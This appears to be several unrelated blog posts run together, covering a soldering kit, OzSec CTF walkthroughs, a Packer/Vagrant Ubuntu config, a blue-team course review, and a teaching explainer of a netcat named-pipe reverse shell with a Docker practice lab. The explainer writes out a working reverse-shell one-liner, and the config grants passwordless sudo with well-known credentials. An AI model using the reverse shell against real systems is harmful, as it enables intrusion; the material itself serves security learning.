First install the xterminfo to the Kali user:

infocmp -x | ssh kali@10.2.10.99 -- tic -x -

Then remote in as Kali user and run the following to install it systemwide:

infocmp -x | sudo tic -x -o /usr/share/terminfo -

Now the terminal should work as expected!

Kit Contents

My portable soldering kit consists of the following:

• Vocuer pencil case from Amazon
• Omnifixo OF-M4
• Workstation case for Omnifixo and Pinecil
• Pinecil v2
• Pine64 USB-C cable
• Pinecil Soldering Tips
• Anker PowerCore 24K
• Engineer SS-02
• Ceramic Tweezers
• UGREEN MagSafe phone stand
• Spudgers
• Magnifying glasses
• Cotton swabs
• Some swag eyeglass cleaner bottle
• Husky small philips screwdriver (Plan to upgrade to LTT precision screwdriver)
• Small soldering mat that I don’t remember where it came from

Inventory

Starting off we have the pencil case that contains everything above. I tried out various cases, some hard shell and some soft, but this one ended up having the perfect amount of elastic loops, pockets, and larger zippered areas. It holds everything I need except the power bank. Even then, I am pretty sure if I re-arranged or didn’t use the magnifier glasses I could just shove the bank in the main compartment.

For my soldering iron I use a Pinecil v2. The first soldering iron I ever used was a Weller that work paid for, and that thing was amazing. Sadly I couldn’t afford that when I wanted a soldering iron at home and went with a cheap knock-off from aliexpress. I never soldered well and didn’t do much. I decided to buy the Pinecil as I needed a new iron and it was very affordable and had great reviews. I love this iron, it’s super easy to use, fast to startup, and extremely portable.

I coupled the Pinecil with Pine64’s silicon USB-C cable, which makes it resistant to melting in case the iron sets down on it or is briefly touched. This cable feels amazing, it’s super flexible and looks great.

For powering the Pinecil I have an Anker PowerCore 24K. This is a Power Delivery 65 watt power bank that I had originally purchased to power my laptop while traveling. It supplies enough power over USB-C PD to power the iron and lasts for ages. When I’m not on the go I use Pine64’s desktop power supply as my permanent power supply on the workbench.

My workstation while soldering is the Omnifixo OF-M4. This is a beautiful set of helping hands clips that are magnetic and very compact. Bonus points for transferring power via the clips so you can actually power up the baseplate with an alligator clip and turn a device on and off by moving a clip. Check out their website for a demo video of that in action.

When I purchased my Omnifixo it didn’t come with the field case, so I had to hunt for my own. I found the amazing Etsy seller OwlFabricationStore that was selling a Omnifixo and Pinecil case. This case adds a solder spool, aluminium stand, a spot for some cleaning pads or wool, and a place to put everything including the Pinecil. It uses the Omnifixo build plate as the lid. Everything is nicely magnetized securely together. Even with the Omnifixo field box I would still choose this option. Every millimeter of space is well utilized and expertly designed.

I have two options to help improve my visibility while soldering. First is a pair of magnifying glasses that go on like regular glasses and includes a little light. These are what I usually use, although they are prtty bulky and take up the entire center area of the case. My second option is a MagSafe phone stand that lets me use the Magnifier app on my iPhone for up close work. It takes some getting used to, but is very doable. The MagSafe securely holds the phone in place and the articulating arm lets me move it wherever I need it.

To round out the kit I have a plethora of consumables. Rubbing alcohol is in a tiny little eyeglass spritz bottle I got as swag from some vendor once. It’s smaller than normal and about the size of a marker. It fits perfectly in the loops of the case. I also keep some cotton swabs to help clean off flux and components. Speaking of flux, I have a small flux pen to help add flux when needed to remove or resolder components. I also have a spare set of soldering tips for the Pinecil.

I have the classic Engineer solder sucker that everyone recommends. I also recommend it. I have had a couple different cheap versions but this one is fantastic. Great build quality and fits perfectly in the case. I also keep a little roll of solder wick that I forgot to take a picture of, it’s tucked away next to the USB-C cable in a little pocket.

For moving components around I have a small plastic spudger that I bought in bulk, and a pair of ceramic tweezers. I kept bending and breaking cheap metal tweezers so decided to go with the ceramic ones as they have replaceable tips if I ever do break them. I haven’t yet, thankfully.

Finally, to remove components so I can get at those pesky PCB’s and to keep components in a semi-safe area, I have a small Husky phillips screwdriver and a small silicon soldering mat with areas to hold and organize screws. I don’t remember where I got the soldering mat. I believe it came with some random component kit or something. There are plenty of options online. I am thinking of grabbing the LTT precision screwdriver to replace the cheap Husky. I am not sure if it will fit though. One day I’ll see and have to update this post as my kit changes.

Final Thoughts

While the above “portable kit” implies I have a “non-portable kit” this actually isn’t true. This is my soldering setup. The only difference between me sodlering at a hacker meetup or conference and me soldering at home is that I use the Pine64 desktop power supply to power my Pinecil instead of my Anker powerbank. Other than that, whenever I need to solder I grab this little black pencil case that has literaly everything I need.

Ping me if we get hacced

Challenge Description

I’ve got a pcap of a machine that was hacced. After some review, our next gen firewall says the traffic is clean. But that’s a lie, could you take a look and see maybe what data was exfiltrated?

Challenge Walkthrough

Opened the packet capture up in Wireshark.

Since the title of this challenge is “Ping me” I filtered on icmp packets.

We can see a whoami command in the first ping packet.

Checking further in the chain, we notice an ls command..

A cat…

And finally the flag itself!

• Points: 100
• Flag: OzSecCTF{M1_G@r@nd_g0_P!ng}

Do Not Start early pls

Challenge Description

There’s a weird domain that showed up on our radar. Could you take a look and see if there’s any information more than what we have?

bruhwhatlmaougothacced.breakict.org

Challenge Walkthrough

Checking DNS on this domain I found a txt record that included the flag.

• Points: 100
• Flag: OzSecCTF{DNS_r3c0rds_but_dns_doesnt_pl4y!}

Coffee and Carding

Challenge Description

One of our sting operations experts retrieved this image from a known cyber criminal. Can you figure out the name of the location the person was at?

FLAG will be OzSecCTF{location_name} - 5 ATTEMPTS

The location name will have no spaces, and is case insensitive

Challenge Walkthrough

00:13:37:a9:57:17 appears to be a MAC address, and this looks like a wifi pineapple.

I visited wigle.net, entered the MAC into the BSSID field and zoomed out. I saw a single entry.

Zooming in we get a location.

Matching up this location in Google Maps I found the cafe.

• Points: 199
• Flag: OzSecCTF{VagabondCafe}

Classic web, Just Sayin’

Challenge Description

Web is funni bc I could literally give you the flag + solve method and you’d still run dirb on the target, wouldn’t you? ;)

https://password-vault-dot-breakict.uc.r.appspot.com/

Challenge Walkthrough

Loading up the page I see a form input requesting a password, looks like it will reveal the flag if we enter the correct password.

Tried entering ‘asdf’ as a test. That’s not it..

Checking source there is a script.js that is loaded. Checking this file we see a password check. The password it’s checking against is right here in cleartext.

Using the above found password works, as expected.

• Points: 50
• Flag: OzSecCTF{cl!3nt_s!d3_dw3ebS!}

I got 2 bits

Challenge Description

Presented to you is a logic diagram, figure out what bits will make the light bulb light up. Careful! you’ve got 3 attempts

IE, if your answer is (top to bottom) 1010 your flag would be OzSecCTF{1010}

Challenge Walkthrough

I had to check the hint on this one, which led to http://www.ee.surrey.ac.uk/Projects/CAL/digital-logic/gatesfunc/index.html where I found a handy chart:

Given that, we have a NOT gateway up top, an AND gate in the middle, and I didn’t see a normal triangle so I will assume it’s the opposite of a NOT gate since it looks the same without the circle symbol.

To generate a 1 on the output of the AND gate and turn the light on we need to feed in a 0 up top which gets turned to a 1, and a 1 on the bottom.

This feeds 1, 1 into the AND gate. 1 and 1 is a 1, which turns on the light.

• Points: 100
• Flag: OzSecCTF{01}

I got 4 bits

Challenge Description

now with 4 bits!

flag will be in format of inputs needed top to bottom, formatted left to right.

ie, if you need top to bottom 1010, the flag is OzSecCTF{1010}

Challenge Walkthrough

This is basically the same as above, with some more complexity thrown in.

We have:

To generate a 1 on the output side of the final AND gate, our inputs end up being:

1, 0 through the NOT and NORMAL into the NOR gate outputs a 1.

0, 1 through the NOT and NORMAL into the AND gate outputs a 1

These two 1’s go into the final AND gate and turn the light on with an output of 1.

• Points: 106
• Flag: OzSecCTF{1001}

You get the GISt of it

Challenge Description

How much property tax was paid for the Drury plaza hotel in 2021? (special tax + general tax), decimal should be included. Flag is OzSecCTF{amount_no_special_chars_except_for_pennies}

Challenge Walkthrough

For reference, the Drury Plaza is located in Wichita, KS. The location of this local CTF.

Searching for Sedgwick County Property Tax leads to this state site:

Entering the address of the hotel:

Clicking on the property link leads to the properties page. From there a transactions tab shows payments.

Adding up the General and Specials taxes for the two 2021 transactions gives us our flag.

• Points: 150
• Flag: OzSecCTF{210357.54}

ASk Me anything!

Challenge Description

Below is a line of ASM code. what is the resulting value stored in EAX after the lines have all run? (INTEL SYNTAX BEST SYNTAX) Flag is OzSecCTF{your_answer} - 3 ATTEMPTS

mov eax, 0
inc eax
mov ebx, 0
inc ebx
inc ebx
imul eax, ebx
xor eax, eax

Challenge Walkthrough

I don’t know assembly, but the final instruction is xor’ing eax by itself. I believe this should be 0, and that was correct:

• Points: 15
• Flag: OzSecCTF{0}

Sanity check

Challenge Description

Sanity check!

submit this flag! OzSecCTF{4moguS}

p.s: do NOT ask for a hint on this challenge, you will regret it

Challenge Walkthrough

Kind of self explanatory…

• Points: 15
• Flag: OzSecCTF{4moguS}

Oh CRap

Challenge Description

A client sent us over a secret to access the application we’re testing for them, but they never learn! they sent it as an image :(

If only there was some technology to convert characters from an image into a recognizable text based format.

hint for this, and future CTF’s everywhere. Look at capitalized characters in the title.

Challenge Walkthrough

We have what appears to be a Base64 encoded string within an image. We need to get this into text so that we can base64 decode it.

I don’t have a screenshot of this step, but I used tesseract-ocr to grab text from the image.

Pasting the results directly into CyberChef to decode we find that some characters don’t quite look right. Possibly some of the OCR was incorrect.

Quickly comparing the image to the text output reveals a few incorrect transcriptions.

Correcting the incorrect L’s, I’s, and 0’s, we get the flag.

• Points: 150
• Flag: OzSecCTF{Aww_geez_oh_man_look_at_me_i_cant_follow_instructions_N0w_S0m3_1337_sp34k_f0r_3ntr0pY}

Unsolved During CTF

The following challenges were not solved by me during the CTF.

cybercrime operations (NOW ON DISCORD!)

Challenge Description

We’ve got sting operators infiltrating every edgy online chat room we could find. This one presents promise as to holding some secret keys. Can you figure out what secret key is being kept?

https://discord.gg/4phkdWUKUv

Challenge Walkthrough

Visit the linked Discord server and see that an admin of the server added a bot. This bot has a secret, but will only give it to you if you are a member of an ‘ADMIN’ role.

Enable Developer mode in Discord User Settings > Advanced.

Copy the ID of the bot by right clicking on it and selecting Copy ID.

The ID was: 1030181821788454982

Searching for adding a bot to a Discord server, we can see an example of the invite link. The client_id parameter is the Bot’s ID. Create a link using the ID copied.

https://discord.com/api/oauth2/authorize?client_id=1030181821788454982&permissions=0&scope=bot applications.commands

Enter this into a browser and login to Discord and you will be presented with this dialog to add the bot to a server you are an admin on.

Select an appropriate server, give yourself an ADMIN role and ask for the secret!

• Points: 200
• Flag: OzSecCTF{Put_ur_clickr_f!ng3r_uP_if_u_r3pr3s3nT_C0mput3r_cr!m3}

L337H4X0R

Challenge Description

We’ve obtained a plain text message and it’s corresponding ciphertext after observing communications between threat actors, supposedly they use some type of XOR algorithm to encrypt the messages, can you crack the key?

I commit more crimes than code hehe get ransomd dw3eb → 065a300a0e2e3d325b355f003a621606364c08034c4705520054500b3b35105817041c5d281f274511223a35143554523b3546113d

Challenge Walkthrough

Took quite a bit of googling, but I solved it with the help of this stackoverflow post: python - Guessing XOR secret key knowing some part of it - Stack Overflow

• Points: 125
• Flag: OzSecCTF{X0r_But_!mpl3m3nt3d_P00rly}

Really Sorry About this

Challenge Description

We’ve identified an RSA public key, can you crack the private key by doing math?

'pub': (e=17, n=926137)

FLAG FORMAT WILL BE OzSecCTF{someint} , where someint is the private key.

Challenge Walkthrough

I definitely had to use the hint on this one, as this was my first exposure to an RSA crypto CTF challenge.

The hint led to http://mathonline.wikidot.com/rsa-encryption

This has the step-by-step instructions for calculating the missing private key from the known e and n values.

We can basically follow along!

Step 1

e = 17 and n = 926137

Step 2

I used factordb.com by pasting in n.

p = 761 and q = 1217

Step 3

WolframAlpha to the rescue! I learned that this symbol is phi.

phi = 924160

Step 4

17d <weird equals> 1 (mod 924160)

Back to WolframAlpha

There’s the flag value.

• Points: 125
• Flag: OzSecCTF{761073}

Too Late, Sorry!

Challenge Description

The CEO’s machine got popped! We’re dealing with the recovery process right now, but all we have to give you for information is this pcap. Can you figure out what c2 framework was utilized to hold a shell on this box? FLAG IS OzSecCTF{c2_name}

flag is case INSENSITIVE, 4 ATTEMPTS

free hint: https://www.thec2matrix.com/

Challenge Walkthrough

Packet capture has TLS traffic on non-standard ports.

Running ja3 against the pcap we the hashes for the fingerprints of the tls traffic.

Find the traffic on non-standard ports.

Search for that hash, found the following article:

Creating Context for Better Hunting - NetWitness Community - 606384

Mentioned hash ec74a5c51106f0419184d0dd08fb05bc is for Metasploit on Kali.

• Points: 200
• Flag: OzSecCTF{Metasploit}

Super Slow! radio

Challenge Description

I started my own pirate radio station! If you missed my first broadcast, here’s a recording!

SuperSlow.wav

Challenge Walkthrough

An audio file encoded as a Slow-Scan TV file. SSTV is a method of displaying images over radio waves typically used in ameture radio.

Running sstv against the file results in the still image, with flag.

• Points: 100
• Flag: OzSecCTF{4_My_n!x_b00m3rS_0nly!}

classic reversing

Challenge Description

heres a binary, reverse it!

Challenge Walkthrough

Checking the binary in Ghidra, I found a print_flag statement.

It appears to be in hex, so I copied and pasted each of those values into CyberChef.

The flag looks reversed, so I reversed it. I then had to piece it back together.

Final flag: OzSecCTF{N!c3_w0rk_Bud!}

• Points: 99
• Flag: OzSecCTF{N!c3_w0rk_Bud!}

Classic web, PATCHED

Challenge Description

I can’t have anything nice, you all just mess everything up. The only thing haccers after 2003 know is break code, web challenge XSS, eat taki’s and lie.

I’ve made an updated site, you’ll never be able to get secrets from this portal

https://classic-web-dot-breakict.uc.r.appspot.com/

Challenge Walkthrough

Loading the page and checking the Console we see a message saying the flag was loaded.

After manually running the get_flag() function:

An XHR request appears:

Loading that URL gets us the flag!

• Points: 200
• Flag: OzSecCTF{R3vers!ng_succS_I_H@v3_Burp}

The VM was built and after the boot command was entered the VM would show a Kernel panic error like below.

After a lot of trial and error I finally found the extremely simple solution. I wasn’t giving the VM enough RAM. After adding the following to the source declaration the VM booted up and auto installed using my cidata files.

  cpus = 2
  memory = 2048

Here is the full ubuntu2204-vmware.pkr.hcl file that worked for me:

packer {
  required_version = ">= 1.7.0"
  required_plugins {
    vmware = {
      version = ">= 1.0.0"
      source  = "github.com/hashicorp/vmware"
    }
  }
}

source "vmware-iso" "ubuntu" {
  boot_wait   = "10s"
  ssh_timeout = "20m"
  boot_command = [
    "<wait>e<down><down><down><end>",
    " autoinstall ds=nocloud;",
    "<F10>",
  ]
  cd_files = [
    "./cidata/meta-data",
    "./cidata/user-data"
  ]
  cd_label = "cidata"

  iso_url          = "./ISO/ubuntu-22.04.2-live-server-amd64.iso"
  iso_checksum     = "5e38b55d57d94ff029719342357325ed3bda38fa80054f9330dc789cd2d43931"
  ssh_username     = "vagrant"
  ssh_password     = "vagrant"
  shutdown_command = "sudo shutdown -P now"
  // cpus             = 2
  // memory           = 2048
}

build {
  name = "packer-ubuntu2204"
  sources = [
    "sources.vmware-iso.ubuntu"
  ]

  post-processor "vagrant" {

  }
}

Here is the associated user-data file, it uses the Vagrant insecure public key and credentials vagrant:vagrant:

#cloud-config
autoinstall:
  version: 1
  early-commands:
    - sudo systemctl stop ssh
  apt:
    disable_components: []
    geoip: true
    preserve_sources_list: false
    primary:
    - arches:
      - amd64
      - i386
      uri: http://us.archive.ubuntu.com/ubuntu
    - arches:
      - default
      uri: http://ports.ubuntu.com/ubuntu-ports
  drivers:
    install: false
  identity:
    hostname: ubuntu
    password: $6$uNphLrAzLra/kNRo$L1umupXWSPFHA34UiYGHWzC4paSr/Ru9lw8JKMXKd48sVHUT0W0S8hv0n.C2.bHHXbfxSiwt0gXbOXUkIeF0Q.
    realname: Vagrant
    username: vagrant
  kernel:
    package: linux-generic
  keyboard:
    layout: us
    toggle: null
    variant: ''
  locale: en_US.UTF-8
  network:
    ethernets:
      ens33:
        dhcp4: true
    version: 2
  source:
    id: ubuntu-server
    search_drivers: false
  ssh:
    allow-pw: true
    authorized-keys: [
      "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA6NF8iallvQVp22WDkTkyrtvp9eWW6A8YVr+kz4TjGYe7gHzIw+niNltGEFHzD8+v1I2YJ6oXevct1YeS0o9HZyN1Q9qgCgzUFtdOKLv6IedplqoPkcmF0aYet2PkEDo3MlTBckFXPITAMzF8dJSIFo9D8HfdOV0IAdx4O7PtixWKn5y2hMNG0zQPyUecp4pzC6kivAIhyfHilFR61RGL+GPXQ2MWZWFYbAGjyiYJnAmCP3NOTd0jMZEnDkbUvxhMmBYSdETk1rRgm+R4LOzFUGaHqHDLKLX+FIPKcF96hrucXzcWyLbIbEgE98OHlnVYCzRdK8jlqm8tehUc9c9WhQ== vagrant insecure public key"
    ]
    install-server: true
  storage:
    config:
    - ptable: gpt
      path: /dev/sda
      wipe: superblock-recursive
      preserve: false
      name: ''
      grub_device: true
      type: disk
      id: disk-sda
    - device: disk-sda
      size: 1048576
      flag: bios_grub
      number: 1
      preserve: false
      grub_device: false
      offset: 1048576
      type: partition
      id: partition-0
    - device: disk-sda
      size: 1902116864
      wipe: superblock
      number: 2
      preserve: false
      grub_device: false
      offset: 2097152
      type: partition
      id: partition-1
    - fstype: ext4
      volume: partition-1
      preserve: false
      type: format
      id: format-0
    - device: disk-sda
      size: 19569573888
      wipe: superblock
      number: 3
      preserve: false
      grub_device: false
      offset: 1904214016
      type: partition
      id: partition-2
    - name: ubuntu-vg
      devices:
      - partition-2
      preserve: false
      type: lvm_volgroup
      id: lvm_volgroup-0
    - name: ubuntu-lv
      volgroup: lvm_volgroup-0
      size: 10737418240B
      wipe: superblock
      preserve: false
      type: lvm_partition
      id: lvm_partition-0
    - fstype: ext4
      volume: lvm_partition-0
      preserve: false
      type: format
      id: format-1
    - path: /
      device: format-1
      type: mount
      id: mount-1
    - path: /boot
      device: format-0
      type: mount
      id: mount-0
  updates: security
  late-commands:
    - echo 'vagrant ALL=(ALL) NOPASSWD:ALL' > /target/etc/sudoers.d/ubuntu
    - curtin in-target --target=/target -- chmod 440 /etc/sudoers.d/ubuntu

Course Overview

The Certified CyberDefender (CCD) is a blue team oriented training course with high quality, in depth material. The learning material is reinforced with multiple hands on, practical, online labs that are very similar to their BlueYard CTF platform. After completing the training material you can attempt the Certified CyberDefender exam which is a practical exam setup just like the online labs.

The CCD course includes 6 modules covering the following topics:

• Security Operations Fundamentals
• Incident Response
• Threat Intelligence
• Digital Forensics
• Threat Hunting and Emulation
• Perimeter Defense (Email Security)

Check the CyberDefenders page on this course and certification for more information: https://cyberdefenders.org/blueteam-training/courses/certified-cyberdefender/

Learning Material Review

The course material is excellent quality, and I often compare it to the SANS SEC504 in quality (my only SANS course that I’ve taken.) The content is densly packed, without any fluff. If anything is mentioned in the material it is very important. There’s not much you can skim on, or would even want to skim, as all the learning objectives and labs are aimed at helping you obtain both the knowledge and mindset required of a CyberDefender.

The Digital Forensics module was the most impactful to me, and I learned an absolute ton of new information and became much more comfortable in my responsibilities at work when an incident required investigation and forensics. The lab guide that went along with the online labs and guided me through an investigation was both fun and a great opportunity to learn and put my newfound knowledge to the test.

Lab Review

In addition to the course content you will gain access to multiple online labs. While some are associated directly with course content (and they have associated walkthroughs and guides) you are encouraged to seek out additional answers beyond what the training course taught.

That’s not to say that the course does not cover everything you need, it does, but there may be faster or easier ways that if you take the time to read tool documentation and get familiar with the tools you could find new ways to answer the questions for the labs.

Overall, I think the labs were the best part of the course.

Exam Experience

When you start the exam (which can be done at any time, no scheduling required) you have 48 hours of access to the exam site. This is almost identical to the online labs you will have done during the course, so the process should be very familiar. It is a practical exam where you are provided with a virtual environment and questions. It’s up to you to answer those questions as best you can. The answers are free form, and you are encouraged to provide additional information with the answer such as how you came to the conclusion or what track you were on.

The exam is graded by real people, and partial points can be awarded. So by providing additional context with your answers you might be able to get a few points for a “Wrong” answer if you were on the right path but didn’t quite get what they were asking.

There are more than one way to find the answers, and answers to questions further on can give you hints on how to answer earlier questions. There were a few questions I had to go back on, after getting further I had a better idea of what I should have been looking for. I don’t know if that helped, but I did get a passing grade!

All aspects of the course are fair game for the exam, so make sure you have a good familiarity and understanding of all the modules. Each module is well represented in the exam, and you have plenty of time. I still lived my life during the exam, I went to dinner and lunch, took the family on a grocery shopping trip. The exam was still waiting for me, and I still had plenty of time to complete it.

I even had to take a step back and start Googling and referencing the course material during the exam to get me back on track if I had forgotten how a particular tool works, or wasn’t sure which direction I needed to be heading.

Certification

Passing the exam at 70% will you reward you with the Certified CyberDefender certification and digital badge.

Value Considerations

The course and exam are currently available with a retail price of $799.99. It is absolutely worth the cost as the content is such great quality, it is worth the price.

For someone looking for some good blue team training, and an up and coming certification, the value is absolutely there. I paid for it out of my own pocket, and if you can get an employwer to fund the training even better!

While many scripts/tools can be ran through 2to3 to convert them, some don’t quite work and you just need to run Python2. In those instances pip is often needed but it’s not easy to install pip for Python2 like you can for Python3.

Thankfully, you can still install it you just have to explicitly download the get-pip.py and run it manually.

To install pip on python2 run these commands:

curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py
sudo python2 get-pip.py

Epic Server Beta! (v.2)

Challenge Description

A developer known as the “Breadministrator” has just created a new site hosted in GCP. It utilizes App engine to host static pages for now.

https://alpha-test-dot-breakict.uc.r.appspot.com/

Rumor has it that the Breadministrator accidentally published some data in the very first revision of the app. The app was shortly updated afterwards. Users a part of the private beta claimed the app was up with the secret information on February 25th, 2022, at approximately 17:22, the app was deployed from CST

Can you find any proof or content from the initial private beta?

Note: regions did not change throughout deployments

P.S.: You don’t need to run directory scans, but may need to mangle/transform the URL to find the exact time (down to seconds) of when the app was first deployed.

https://alpha-test-dot-breakict.uc.r.appspot.com/

Challenge Walkthrough

Visiting the site we see that it now has redacted some private information.

Searching for appspot and previous versions I ran across a StackOverflow post talking about how Google Cloud doesn’t remove previous versions automatically, and all versions of an app that are published are by default still accessible via a different subdomain.

https://stackoverflow.com/questions/43430383/gcloud-app-deploy-does-not-remove-previous-versions

In the screenshot of the post you can see the versions are a date and time stamp: <yyyymmdd>t<hhmmss>.

Searching documentation for Google Cloud we find an example of accessing versions using a specific URL of https://<VERSION>-dot-<SERVICE>-dot-<PROJECT_ID>.<REGION_ID>.r.appspot.com

With this information, and the date and time mentioned in the challenge question, I need to find the previous version that was published sometime on February 25th, 2022, at approximately 17:22. The URL of https://20220225t1722??-dot-alpha-test-dot-breakict.uc.r.appspot.com We just need to guess the right seconds.

My approach was to use PowerShell to generate a list of URL’s and wget each of them. I would then compare the file sizes to identify any outliers.

00..59 | %{wget "https://20220225t1722$_-dot-alpha-test-dot-breakict.uc.r.appspot.com"}

This downloaded one index.html for each second. Looking through the list at their file sizes I saw the one toward the end has a different file size. It is 316 bytes when all other pages are 278 bytes.

Looking at the contents of index.html.39 revealed the flag!

• Points: 350
• Flag: OzSecCTF{@pp_3ng!n3_m0r3_l!k3_@55_Pr0t3ct!0n5}

Where the hell did I leave my bucket

Challenge Description

We believe breakict may have some type of cloud bucket blob big data lake thingy. We’re looking for a secret flag.txt file. Could you find it for us pls? We don’t know anything new about this organization. The bucket could be named anything

P.S.: once you’ve found the bucket, again, there’s a flag.txt with the secret

Challenge Walkthrough

We need to find a storage account, our options are potentially AWS S3, GCP, or Azure. I will start by looking for an S3 bucket, typically companies use their company name for a bucket name so I will first just guess at breakict.s3.amazonaws.com

We have an access denied, this means the bucket exists, otherwise we would get a bucket does not exist error. Let’s try to grab the /flag.txt mentioned in the introduction.

• Points: 100
• Flag: OzSecCTF{Y0u_F0und_m3!_g00d_j0b_ch@mp!}

Took my b64 and we flew it into orbit

Challenge Description

sigh here’s some string we found. Decode it or somethin =0nel9Fdp91MrRTbfxGbnk0Xl5WIm9Ve0sGM7ZEVDNWZTp3T

Challenge Walkthrough

The = is a giveaway that this is most likely Base64 encoded, and since it’s the first character the string is likely reversed.

Let’s throw it into CyberChef and use a recipe of Reverse, From Base64.

• Points: 100
• Flag: OzSecCTF{0k4y_f!ne_I'll_m4k3_it_ez}

Cracking Kraken

Challenge Description

We’ve obtained a hashed password! We don’t know what algorithm they’re hashed in, nor do we care, that’s your job. Have fun! The flag is the recovered password inside of the OzSecCTF{} wrapper PS: I’ll save you the effort, the password isn’t in rockyou.txt, it’s 2022 ;)

Some details about the org the hash is from:

• The org name is BreakICT
• The org previously had a breached password, so we assume this one has been ‘updated’
• The org requires at least 1 captial letter, 1 number, 1 special char, and at least 8 chars in password length

Here’s the hash: ebe041077189044d2b35194447e71aeb

Challenge Walkthrough

For this one I just took a stab and guessed correctly the first try: BreakICT2022!

Running this through md5sum matches the hash provided.

• Points: 200
• Flag: OzSecCTF{BreakICT2022!}

Netcat Named Pipe

Here is the reverse shell command that we are taking a deeper look into:

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc IP PORT > /tmp/f

If you have remote code execution on a target system, and that system has nc installed and available, you can enter the above code (replacing IP and PORT with your own IP and a listening port), and you will get a shell on the target box that lets you enter commands and receive the output in your own terminal.

Let’s break down each of these individual commands and take a closer look at what they do and how they work together to give you a semi-interactive reverse shell.

rm /tmp/f;
This removes the /tmp/f file if it exists. This allows the file to be created in the next step without interfering with an existing file. Ideally, this filename should be fairly unique. If you’re using this in a CTF or engagement, make sure to use a unique filename for all instances of the /tmp/f file in the command.

mkfifo /tmp/f;
This uses mkfifo to create a “first in, first out” file, also known as a named pipe. This special type of file can be opened by one process for reading and another for writing. Anything the writing process puts in the file is immediately read by the process that is reading it.

cat /tmp/f
cat is typically used to read a file and output its contents to the terminal. Here, since we are reading a FIFO (named pipe) file, cat will read the file, but since no program has begun writing to it, there is no End of File (EOF) marker. The program waits at this point for data to appear. When new data arrives, it reads and sends it down the pipeline to the next command. If no EOF is seen, it pauses and keeps retrying until more data is added. This repeats until EOF is read.

| /bin/sh -i 2>&1
The contents from /tmp/f are sent to the /bin/sh shell. The -i flag starts an interactive session, executing commands as they are read from /tmp/f. The 2>&1 part redirects standard error to standard output. By default, error output is not forwarded in the pipeline. Redirecting it ensures that both standard output and error are sent to the next command.

Why do almost all reverse shells use /bin/sh instead of the friendlier /bin/bash?
Not all systems have /bin/bash installed. However, /bin/sh will always be available on all Unix/Linux systems, including embedded and IoT devices.

| nc IP PORT > /tmp/f
Next, we take the output of sh (executing commands from /tmp/f) and use netcat to connect to the specified IP and port. Any input received from the IP (e.g., typed commands) is written to /tmp/f, read by cat, and piped into sh, completing the loop.

Putting It All Together

This type of reverse shell is cyclical. Initially, you read the empty /tmp/f file, and /bin/sh executes nothing. The output is sent to nc at your IP, which lets you type a command. That command is written to /tmp/f, picked up by cat /tmp/f, and executed by sh. The output is sent back to your nc session, and displayed in your terminal.

Hands-On Docker Lab

If you have Docker, you can use this hands-on lab to practice reverse shell commands demonstrated in this post. You can also try out other techniques. For a great reverse shell reference and command builder, check out RevShells.com.

Prerequisites

You will need Docker and Netcat installed on your PC.

Installing Docker

Docker is available for Windows, Linux, and macOS. Refer to the official Docker documentation for installation instructions.

Installing Netcat

Windows
Download nc.exe from int0x33’s GitHub and run it from the command prompt.

Linux
Netcat should be available via your distribution’s package manager.

macOS
Netcat should be installed by default. Run nc from a Terminal to check.

Finding Your IP

To connect back to your machine, you need your local IP address.

Windows
Run:

ipconfig

Look for your IPv4 address under either the Ethernet or Wireless adapter section.

Linux and macOS
Run:

ifconfig

Starting the Docker rce-lab

Run the following to launch the Docker image and serve it on port 80:

docker run -itp 80:80 --rm rufflabs/rce-lab

Testing Remote Code Execution

Go to http://localhost/ in your browser. You should see a simple web page with an input box. Try commands like whoami or ls -al to confirm code execution. Confirm that nc is available by running which nc. If it returns a path, it’s available.

Gaining a Reverse Shell

Once you confirm code execution in the Docker container, you can likely obtain a reverse shell via Netcat.

Starting a Netcat Listener

Open a terminal and run the following (modify as needed):

Linux/Windows:

nc -lp 4444

macOS:

nc -l 4444

The terminal will wait for a connection.

Using RCE for Reverse Shell

Update the original command with your IP and port:

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.101 4444 > /tmp/f

Paste it into the website input box and submit. The page may hang — that’s expected. Switch to your terminal, and you should see a shell prompt.

Why does the browser hang?
The PHP backend runs the reverse shell and waits forever as the process doesn’t complete. It hangs until it times out, potentially disconnecting your reverse shell.

If you, like many I would hope, run a currently supported version of Windows 10 there is no (that I could find at least) Windows Update that will apply the required security updates to take care of this BootHole vulnerability. Below we will be taking a look at what options are available to install the required patches into the systems firmware to take care of this vulnerability.

Remediating via DBX Updates

This vulnerability is remediated by installing some DBX updates into the UEFI firmware of the affected system, so that Secure Boot knows what boot loaders it should or should not allow to be installed.

UEFI has published a series of updates to the DBX database that deny a Secure Boot system from installing any of the vulnerable GRUB bootloaders. The hashes of these bootloaders are added a revocation list that Secure Boot checks to make sure the bootloader is not revoked. Once these DBX Updates are installed into the firmware of a system the vulnerable GRUB bootloaders can no longer be installed, thus remediating this vulnerability.

Windows Update (Win10 versions 20H1+)

If you happen to be running any of the below versions of Windows, then you can install KB4535680 which allegedly updates the Secure Boot with these new DBX updates.

KB4535680 Applies To:

• Windows Server 2012 x64-bit
• Windows Server 2012 R2 x64-bit
• Windows 8.1 x64-bit
• Windows Server 2016 x64-bit
• Windows Server 2019 x64-bit
• Windows 10, version 1607 x64-bit
• Windows 10, version 1803 x64-bit
• Windows 10, version 1809 x64-bit
• Windows 10, version 1909 x64-bit

  These were taken directly from Windows Update KB4535680: Security update for Secure Boot DBX

Installing the above KB should remediate the vulnerability as found by Nessus. I have not been able to use this KB, however, since I only have newer versions of Windows 10 that were being identified by Nessus as vulnerable to BootHole. I am also not sure if this KB includes the absolute latest updates from the UEFI Forum.

Manual Windows DBX Updates

Microsoft published an article titled Microsoft guidance for applying Secure Boot DBX update that provides the manual steps required to install the DBX updates. The steps are summarized below.

Obtain the DBX Updates

Download the relevant (x64, x86, ARM) updates directly from Unified Extensible Firmware Interface Forum. You will also need the older updates, which can be found in the linked archive containing Prior Versions of DBX files as these updates are not cumulative. You will be downloading a single .bin binary file for each round of updates.

Split the DBX files

To apply the updates we need to split the .bin files that were downloaded into two parts, a .p7 signature file and another .bin binary file. This can be done via PowerShell.

You will need to download the SplitDbxContent.ps1 script which was authored by Microsoft. You can get it from the PowerShell Gallery. Follow the instructions on the Gallery to obtain that file.

Once you have the SplitDbxContent.ps1 script, run the following PowerShell to create the signature and contents files.

